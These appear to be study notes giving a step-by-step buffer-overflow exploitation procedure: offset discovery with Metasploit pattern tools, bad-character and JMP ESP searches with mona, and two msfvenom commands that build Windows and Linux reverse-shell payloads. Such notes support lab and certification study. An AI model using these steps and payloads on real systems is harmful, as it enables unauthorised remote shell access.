Procedure

Finding the offset

msf-pattern_create -l 2500

Finding the exact value of the offset.

-q: correspond to the value of the EIP when the application crashed.

-l: corresponds to the length of the msf-pattern_create

Both methods are valid to find the offset

msf-pattern_offset -l 2500 -q 35724134

OR

-distance: corresponds to the distance of the pattern msf-pattern_create.

!mona findmsp -distance 2400

Finding the badchars

Create a mona working repertory

!mona config -set workingfolder c:\mona

Creating a mona bytearray string excluding the badcharacter \x00 which is a bad character by default.

!mona bytearray -cpb "\x00"

Compare with !mona module

-a: correspond to the ESP value when the application crashed.

!mona compare -f c:\mona\bytearray.bin -a 005FFCB0

Manual method

We expect to see all characters from \x01 to \xff in sequential order.

The character \x51 is missing and therefore considered as bad character

Remove the \x51 character from the bad character strings from the exploit.py script. Resend the bad character string to the application, and redo the process until you do not encounter any anomaly in the sequence.

Finding the right module

This command will find all JMP address that does not contain any bad characters identified earlier.

!mona jmp -r esp -cpb "\x00"

Generating the payload

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.177.130 LPORT=9999 EXITFUNC=thread -b "\x00" -f c

msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.49.230 LPORT=7138 -f c -b "\x00" EXITFUNC=thread